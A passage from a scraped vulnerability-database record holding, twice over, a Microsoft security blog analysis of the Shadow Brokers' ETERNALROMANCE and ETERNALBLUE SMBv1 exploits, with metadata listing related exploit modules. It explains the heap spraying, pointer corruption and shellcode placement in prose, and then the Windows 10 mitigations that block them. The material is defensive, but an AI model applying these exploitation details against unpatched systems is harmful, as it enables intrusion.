[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>), which targeted a large number of out-of-date systems and held encrypted files for ransom.\n\nAlthough the exploits are ineffective on newer platforms or attempt to take advantage of already patched vulnerabilities, they nevertheless provide an opportunity to analyze and evaluate whether the exploitation techniques used are still viable on Windows 10 systems with Creators Update.\n\nIn Windows 10, key security enhancements such as kernel Address Space Layout Randomization ([kASLR](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), kernel Data Execution Prevention ([DEP](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), and virtualization-based security (VBS) capabilities delivered with [Device Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/deploy-device-guard-enable-virtualization-based-security>) all contribute to breaking the exploit techniques observed in the wild. Through VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that's mapped in the kernel address space. Alongside Device Guard is the new kernel [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (kCFG) introduced with Windows 10 Creators Update. kCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\n\nIn this blog, we provide an in-depth analysis of two of the exploits released by the Shadow Brokers. Both exploits allow arbitrary code execution through vulnerabilities in the Server Message Block (SMBv1) file-sharing server implementation.\n\nWe follow with a discussion about how Device Guard and kCFG prevent these exploits\u2014and many other exploits\u2014from installing backdoor implants in kernel memory.\n\n## The exploit kit\n\nThe kit\u2019s directory structure shows a modular exploitation framework, where payloads are kept separate from exploits.\n\n\n\n_Figure 1. Exploit kit directory structure_\n\nAll the binaries in the kit contain multiple strings that describe their purpose. Furthermore, the kit exports common functionality to DLL files, revealing additional information through referenced function names. While the strings and the function calls were not necessary for us to examine the kit, both helped speed up our initial analysis.\n\nFor more information about the individual exploits in the kit that targeted Microsoft products, refer to the [blog post from Microsoft Security Response Center](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n## ETERNALROMANCE SMB exploit\n\nLet\u2019s dig into the guts of one of the exploits in the kit.\n\nETERNALROMANCE is a remote code execution (RCE) exploit against the legacy SMBv1 file sharing protocol. It takes advantage of [CVE-2017-0145](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which has been patched with the [MS17-010 security bulletin](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). One might note that file sharing over SMB is normally used only within local networks and that the SMB ports are typically blocked from the internet at the firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a _type confusion_ vulnerability leading to an _attacker offset controlled_ arbitrary heap write. As with almost any _heap corruption_ exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\n\n### Getting a reliable heap layout\n\nThe exploit begins to spray the heap by starting several concurrent instances of [SMB_ COM_TRANSACTION](<https://msdn.microsoft.com/en-us/library/ee441489.aspx>). The exploit binary supports three different heap spray methods, allowing it to deal with varying pool behaviors between Windows versions. Apart from the first few allocations (the exact number depends on the pool state), transaction objects are allocated with a fixed, predictable displacement from each other. After the spray has finished, the exploit uses an info leak in a _TRANS_PEEK_NMPIPE_ transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\nA network trace can quickly visualize what's going on:\n\n\n\n_Figure 2. Network packet containing leaked pool memory_\n\n### Building primitives from heap corruption\n\nThe spray has placed many _TRANSACTION_ objects on the heap at a known distance from each other. And because the exploit has leaked the size of a pointer, it knows the offsets to all fields in the _TRANSACTION_ object. The exploit can now\u2014using carefully crafted offsets\u2014use the type _confusion out-of-bounds write_ from one object to corrupt an adjacent one.\n\nBy overwriting the ID associated with the victim object with a hardcoded number (zero), the exploit can now refer to the object without knowing what the original ID was.\n\n\n\n_Figure 3. Heap layout after the spray_\n\nThe exploit proceeds to corrupt the transaction structure in a variety of ways, constructing arbitrary read-write (RW) primitives. It writes additional fields to prevent the transaction from being freed when consumed, allowing the exploit to continue reusing the same transaction for multiple requests without having to pick a new target object to corrupt.\n\n\n\n_Figure 4. InData pointer observed in WinDbg being overwritten by heap out-of-bounds write_\n\n### Installing in-memory backdoor\n\nAt this point, the exploit code attempts to plant backdoor code inside the SMB driver. This step consists of copying shellcode into the non-paged pool, corrupting a function pointer to point to the shellcode and having that function pointer executed. Note that starting with Windows 8, SMB has moved to using non-executable pools, rendering this method ineffective on newer platforms.\n\nTo find a good spot for the function pointer, the exploit follows a pointer on the heap to reach the data segment. Scanning the data segment, it proceeds to look for a table of function pointers that is used to dispatch different _SMB_COM_TRANSACTION2_ subcommands to different functions.\n\nWhen it finds the table of function pointers, the exploit overwrites the 14th entry on this table, which corresponds to the _TRANS2_SESSION_SETUP_ subcommand. [MSDN documentation](<https://msdn.microsoft.com/en-us/library/ee441654.aspx>) describes this subcommand as reserved, making it an ideal candidate for triggering the backdoor as it is almost never present in SMB traffic.\n\nWhenever an SMB packet is sent with this subcommand ID to the target device, the function pointer gets executed, triggering the shellcode. This mechanism and the backdoor code are not persistent\u2014they require a persistent second-stage component to survive a reboot.\n\n\n\n_Figure 5. Decompiled code for planting the backdoor_\n\n## ETERNALBLUE SMB exploit\n\nThe WannaCrypt malware spreads by using an adapted version of the ETERNALBLUE exploit. This bug, which targets a different SMBv1 vulnerability, is a linear buffer overrun on the pool.\n\nThe bug occurs in a special case when converting a list of [extended attributes](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff545793\\(v=vs.85\\).aspx>) (EA) from one format to another. If the list contains an EA entry that goes outside the packet buffer, the list is truncated as if it only included up to the last valid entry.\n\nWhen updating the length of the list, the size is written to as if it were a 16-bit ushort, when it is actually a 32-bit ulong. This means that the upper 16-bits are not updated when the list gets truncated:\n\n\n\n_Figure 6. Size of list of extended attributes_ (EA)\n\nThe code allocates a buffer with a size calculated to fit all EA entries up to the truncation. But as the list size was increased, this leads to a linear heap overflow with attacker controlled data.\n\nIn a similar way as before, heap is sprayed but this time with _srvnet!SRVBUFFER_ objects using the SMBv2 protocol. This object contains two key pointers that they target: an [MDL](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff554414\\(v=vs.85\\).aspx>) pointer that receives network packet payload and a pointer to a _srvnet!SRVNET_CONNECTION_ object. Both pointers are overwritten so that they point to fixed addresses in the HAL region (used by the_ hardware abstraction layer_).\n\nBecause of the corrupted MDL pointer, the next packet payload will get written to the HAL region. This payload contains shellcode and initializes the memory structure for a fake _srvnet!SRVNET_CONNECTION_ object. The connection object has a pointer to a srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure that contains function pointers.\n\nAfter the packet payload has been received, the _SRVNET_RECEIVE_HANDLER_ function pointer is executed from the attacker-controlled srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure, jumping to the shellcode.\n\nOn Windows 7, which is the system that the exploit targets, the HAL region is mapped as readable, writable, and executable. On newer systems the HAL region is no longer executable, meaning that the CPU would fault when trying to execute the shellcode. Furthermore, the HAL region and other kernel regions (such as page tables) have been randomized on the latest 64-bit versions of Windows 10, breaking assumptions of the 64-bit version in the ETERNALBLUE exploit.\n\n\n\n_Figure 7. Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object_\n\n## Mitigation with virtualization-based security\n\nVirtualization-based security (VBS) provided with Device Guard on Windows 10 and kCFG enhancements with Creators Update stop common exploitation techniques, including those utilized by ETERNALROMANCE and ETERNALBLUE.\n\n### Stopping shellcode execution with W^X enforcement\n\nOn systems that have [Device Guard VBS enabled](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security>), writing and then executing shellcode\u2014such as the ETERNALROMANCE backdoor\u2014in the kernel is not possible due to W^X enforcement policies in the hypervisor. These policies ensure that a kernel memory page is never both writable and executable at any given time.\n\nEven if an attacker tries to attack page tables, the hypervisor is still able to force the _execute-disable_ bit through [extended page tables (EPT)](<https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf>). This in turn forces attackers to rely on code-reuse methods, such as return-orientation programming (ROP). As a consequence, the shellcode implant library in the Shadow Brokers release is fundamentally incompatible with VBS-protected systems.\n\n### Preventing use of corrupt function pointers with kCFG\n\nIn [Windows 10 Creators Update](<https://www.microsoft.com/en-US/windows/features>), we introduced a new security mitigation in the kernel space for VBS-enabled systems. The kernel is now compiled with [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (CFG)\u2014a control flow integrity solution designed to prevent common stack-pivoting techniques that rely on corrupt function pointers or C++ virtual method tables.\n\nControl Flow Guard in the compiled kernel (also known as _kCFG_) aims to verify all indirect call targets before invoking them. This makes it harder for an attacker to execute code by abusing function pointers or other indirect calls.\n\nIn the case of the ETERNALROMANCE exploit, the subverted function pointer would lead to a security fault when invoked, making the exploit non-functional in its current form. The same applies for ETERNALBLUE, which also relies on a corrupted function pointer to achieve code execution.\n\n\n\n_Figure 8. With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr_\n\nOn early Windows 10 systems before Creators Update and without Device Guard, it is possible to attack the page tables of the HAL region to turn it executable and gain code execution using the ETERNALBLUE exploit technique.\n\n## Secure computing with Windows 10 Creators Update\n\nWhile we actively provide patches for vulnerabilities in services like SMBv1, we strive to deliver more and more system-wide mitigations that proactively protect our users from current, as well as future, exploitation and attack methods.\n\nCustomers who run Windows 10 Creators Update benefit from [Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>) and security enhancements like kCFG and W^X. They also benefit from a [host of other security features](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-security>) that have been strengthened with Windows 10 Creators Update, including:\n\n * [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender>) for endpoint antimalware protection powered by the Microsoft Intelligent Security Graph, which learns from [billions of devices worldwide](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>)\n * [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) enables enterprises to detect breach activity early and respond fast; try it for free with Windows 10 Enterprise\n * [Microsoft Edge](<https://www.microsoft.com/en-au/windows/microsoft-edge>) is a proven fast browser secured by virtualization and by Windows Defender SmartScreen\n\n### Reducing exposure to SMBv1 exploits on older platforms\n\nMicrosoft strongly advises customers to apply all available security updates in a timely manner. To reduce the attack surface on your network, block inbound SMB traffic at the firewall and, if possible, [disable the SMBv1 compatibility driver](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>).\n\n \n\n_**Viktor Brange**_ \n_ Windows Offensive Security Research Team_", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-06-30T15:02:19", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2017-06-30T15:02:19", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "d69fe5eabc1a7c8f502269bc7e7a898f5aa04bfacdcac57727e9eafb534fcfc1", "hashmap": [{"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d8272541e029e5f0b1e77c3a06d01c06", "key": "href"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "b943e3715f6c77878c82e1175d6fadd2", "key": "title"}, {"hash": "96d5a82c7285b01222a022efcc48cebd", "key": "published"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "4166d9c412dcd1fbbfeff20425ad5162", "key": "description"}, {"hash": "96d5a82c7285b01222a022efcc48cebd", "key": "modified"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "id": "MMPC:C211C70545FBDF88C2F99362DC4608A8", "immutableFields": [], "lastseen": "2017-06-30T15:02:19", "modified": "2017-06-16T18:17:03", "objectVersion": "1.5", "published": "2017-06-16T18:17:03", "references": [], "reporter": "msft-mmpc", "title": "Analysis of the Shadow Brokers release and mitigation with Windows 10 virtualization-based security", "type": "mmpc", "viewCount": 245}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-06-30T15:02:19"}], "modified": "2017-06-16T18:17:03", "lastseen": "2017-06-30T15:02:19", "published": "2017-06-16T18:17:03", "description": "\n\nOn April 14, a group calling themselves the Shadow Brokers caught the attention of the security community by [releasing a set of weaponized exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>). Shortly thereafter, one of these exploits was used to create wormable malware that we now know as [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>), which targeted a large number of out-of-date systems and held encrypted files for ransom.\n\nAlthough the exploits are ineffective on newer platforms or attempt to take advantage of already patched vulnerabilities, they nevertheless provide an opportunity to analyze and evaluate whether the exploitation techniques used are still viable on Windows 10 systems with Creators Update.\n\nIn Windows 10, key security enhancements such as kernel Address Space Layout Randomization ([kASLR](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), kernel Data Execution Prevention ([DEP](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), and virtualization-based security (VBS) capabilities delivered with [Device Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/deploy-device-guard-enable-virtualization-based-security>) all contribute to breaking the exploit techniques observed in the wild. Through VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that's mapped in the kernel address space. Alongside Device Guard is the new kernel [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (kCFG) introduced with Windows 10 Creators Update. kCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\n\nIn this blog, we provide an in-depth analysis of two of the exploits released by the Shadow Brokers. Both exploits allow arbitrary code execution through vulnerabilities in the Server Message Block (SMBv1) file-sharing server implementation.\n\nWe follow with a discussion about how Device Guard and kCFG prevent these exploits\u2014and many other exploits\u2014from installing backdoor implants in kernel memory.\n\n## The exploit kit\n\nThe kit\u2019s directory structure shows a modular exploitation framework, where payloads are kept separate from exploits.\n\n\n\n_Figure 1. Exploit kit directory structure_\n\nAll the binaries in the kit contain multiple strings that describe their purpose. Furthermore, the kit exports common functionality to DLL files, revealing additional information through referenced function names. While the strings and the function calls were not necessary for us to examine the kit, both helped speed up our initial analysis.\n\nFor more information about the individual exploits in the kit that targeted Microsoft products, refer to the [blog post from Microsoft Security Response Center](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n## ETERNALROMANCE SMB exploit\n\nLet\u2019s dig into the guts of one of the exploits in the kit.\n\nETERNALROMANCE is a remote code execution (RCE) exploit against the legacy SMBv1 file sharing protocol. It takes advantage of [CVE-2017-0145](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which has been patched with the [MS17-010 security bulletin](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). One might note that file sharing over SMB is normally used only within local networks and that the SMB ports are typically blocked from the internet at the firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a _type confusion_ vulnerability leading to an _attacker offset controlled_ arbitrary heap write. As with almost any _heap corruption_ exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\n\n### Getting a reliable heap layout\n\nThe exploit begins to spray the heap by starting several concurrent instances of [SMB_ COM_TRANSACTION](<https://msdn.microsoft.com/en-us/library/ee441489.aspx>). The exploit binary supports three different heap spray methods, allowing it to deal with varying pool behaviors between Windows versions. Apart from the first few allocations (the exact number depends on the pool state), transaction objects are allocated with a fixed, predictable displacement from each other. After the spray has finished, the exploit uses an info leak in a _TRANS_PEEK_NMPIPE_ transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\nA network trace can quickly visualize what's going on:\n\n\n\n_Figure 2. Network packet containing leaked pool memory_\n\n### Building primitives from heap corruption\n\nThe spray has placed many _TRANSACTION_ objects on the heap at a known distance from each other. And because the exploit has leaked the size of a pointer, it knows the offsets to all fields in the _TRANSACTION_ object. The exploit can now\u2014using carefully crafted offsets\u2014use the type _confusion out-of-bounds write_ from one object to corrupt an adjacent one.\n\nBy overwriting the ID associated with the victim object with a hardcoded number (zero), the exploit can now refer to the object without knowing what the original ID was.\n\n\n\n_Figure 3. Heap layout after the spray_\n\nThe exploit proceeds to corrupt the transaction structure in a variety of ways, constructing arbitrary read-write (RW) primitives. It writes additional fields to prevent the transaction from being freed when consumed, allowing the exploit to continue reusing the same transaction for multiple requests without having to pick a new target object to corrupt.\n\n\n\n_Figure 4. InData pointer observed in WinDbg being overwritten by heap out-of-bounds write_\n\n### Installing in-memory backdoor\n\nAt this point, the exploit code attempts to plant backdoor code inside the SMB driver. This step consists of copying shellcode into the non-paged pool, corrupting a function pointer to point to the shellcode and having that function pointer executed. Note that starting with Windows 8, SMB has moved to using non-executable pools, rendering this method ineffective on newer platforms.\n\nTo find a good spot for the function pointer, the exploit follows a pointer on the heap to reach the data segment. Scanning the data segment, it proceeds to look for a table of function pointers that is used to dispatch different _SMB_COM_TRANSACTION2_ subcommands to different functions.\n\nWhen it finds the table of function pointers, the exploit overwrites the 14th entry on this table, which corresponds to the _TRANS2_SESSION_SETUP_ subcommand. [MSDN documentation](<https://msdn.microsoft.com/en-us/library/ee441654.aspx>) describes this subcommand as reserved, making it an ideal candidate for triggering the backdoor as it is almost never present in SMB traffic.\n\nWhenever an SMB packet is sent with this subcommand ID to the target device, the function pointer gets executed, triggering the shellcode. This mechanism and the backdoor code are not persistent\u2014they require a persistent second-stage component to survive a reboot.\n\n\n\n_Figure 5. Decompiled code for planting the backdoor_\n\n## ETERNALBLUE SMB exploit\n\nThe WannaCrypt malware spreads by using an adapted version of the ETERNALBLUE exploit. This bug, which targets a different SMBv1 vulnerability, is a linear buffer overrun on the pool.\n\nThe bug occurs in a special case when converting a list of [extended attributes](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff545793\\(v=vs.85\\).aspx>) (EA) from one format to another. If the list contains an EA entry that goes outside the packet buffer, the list is truncated as if it only included up to the last valid entry.\n\nWhen updating the length of the list, the size is written to as if it were a 16-bit ushort, when it is actually a 32-bit ulong. This means that the upper 16-bits are not updated when the list gets truncated:\n\n\n\n_Figure 6. Size of list of extended attributes_ (EA)\n\nThe code allocates a buffer with a size calculated to fit all EA entries up to the truncation. But as the list size was increased, this leads to a linear heap overflow with attacker controlled data.\n\nIn a similar way as before, heap is sprayed but this time with _srvnet!SRVBUFFER_ objects using the SMBv2 protocol. This object contains two key pointers that they target: an [MDL](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff554414\\(v=vs.85\\).aspx>) pointer that receives network packet payload and a pointer to a _srvnet!SRVNET_CONNECTION_ object. Both pointers are overwritten so that they point to fixed addresses in the HAL region (used by the_ hardware abstraction layer_).\n\nBecause of the corrupted MDL pointer, the next packet payload will get written to the HAL region. This payload contains shellcode and initializes the memory structure for a fake _srvnet!SRVNET_CONNECTION_ object. The connection object has a pointer to a srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure that contains function pointers.\n\nAfter the packet payload has been received, the _SRVNET_RECEIVE_HANDLER_ function pointer is executed from the attacker-controlled srvnet!_SRVNET_CLIENT_CONNECTION_DISPATCH_ structure, jumping to the shellcode.\n\nOn Windows 7, which is the system that the exploit targets, the HAL region is mapped as readable, writable, and executable. On newer systems the HAL region is no longer executable, meaning that the CPU would fault when trying to execute the shellcode. Furthermore, the HAL region and other kernel regions (such as page tables) have been randomized on the latest 64-bit versions of Windows 10, breaking assumptions of the 64-bit version in the ETERNALBLUE exploit.\n\n\n\n_Figure 7. Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object_\n\n## Mitigation with virtualization-based security\n\nVirtualization-based security (VBS) provided with Device Guard on Windows 10 and kCFG enhancements with Creators Update stop common exploitation techniques, including those utilized by ETERNALROMANCE and ETERNALBLUE.\n\n### Stopping shellcode execution with W^X enforcement\n\nOn systems that have [Device Guard VBS enabled](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security>), writing and then executing shellcode\u2014such as the ETERNALROMANCE backdoor\u2014in the kernel is not possible due to W^X enforcement policies in the hypervisor. These policies ensure that a kernel memory page is never both writable and executable at any given time.\n\nEven if an attacker tries to attack page tables, the hypervisor is still able to force the _execute-disable_ bit through [extended page tables (EPT)](<https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf>). This in turn forces attackers to rely on code-reuse methods, such as return-orientation programming (ROP). As a consequence, the shellcode implant library in the Shadow Brokers release is fundamentally incompatible with VBS-protected systems.\n\n### Preventing use of corrupt function pointers with kCFG\n\nIn [Windows 10 Creators Update](<https://www.microsoft.com/en-US/windows/features>), we introduced a new security mitigation in the kernel space for VBS-enabled systems. The kernel is now compiled with [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (CFG)\u2014a control flow integrity solution designed to prevent common stack-pivoting techniques that rely on corrupt function pointers or C++ virtual method tables.\n\nControl Flow Guard in the compiled kernel (also known as _kCFG_) aims to verify all indirect call targets before invoking them. This makes it harder for an attacker to execute code by abusing function pointers or other indirect calls.\n\nIn the case of the ETERNALROMANCE exploit, the subverted function pointer would lead to a security fault when invoked, making the exploit non-functional in its current form. The same applies for ETERNALBLUE, which also relies on a corrupted function pointer to achieve code execution.\n\n\n\n_Figure 8. With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr_\n\nOn early Windows 10 systems before Creators Update and without Device Guard, it is possible to attack the page tables of the HAL region to turn it executable and gain code execution using the ETERNALBLUE exploit technique.\n\n## Secure computing with Windows 10 Creators Update\n\nWhile we actively provide patches for vulnerabilities in services like SMBv1, we strive to deliver more and more system-wide mitigations that proactively protect our users from current, as well as future, exploitation and attack methods.\n\nCustomers who run Windows 10 Creators Update benefit from [Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>) and security enhancements like kCFG and W^X. They also benefit from a [host of other security features](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-security>) that have been strengthened with Windows 10 Creators Update, including:\n\n * [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender>) for endpoint antimalware protection powered by the Microsoft Intelligent Security Graph, which learns from [billions of devices worldwide](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>)\n * [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) enables enterprises to detect breach activity early and respond fast; try it for free with Windows 10 Enterprise\n * [Microsoft Edge](<https://www.microsoft.com/en-au/windows/microsoft-edge>) is a proven fast browser secured by virtualization and by Windows Defender SmartScreen\n\n### Reducing exposure to SMBv1 exploits on older platforms\n\nMicrosoft strongly advises customers to apply all available security updates in a timely manner. To reduce the attack surface on your network, block inbound SMB traffic at the firewall and, if possible, [disable the SMBv1 compatibility driver](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>).\n\n \n\n_**Viktor Brange**_ \n_ Windows Offensive Security Research Team_", "title": "Analysis of the Shadow Brokers release and mitigation with Windows 10 virtualization-based security", "cvelist": ["CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 245, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": 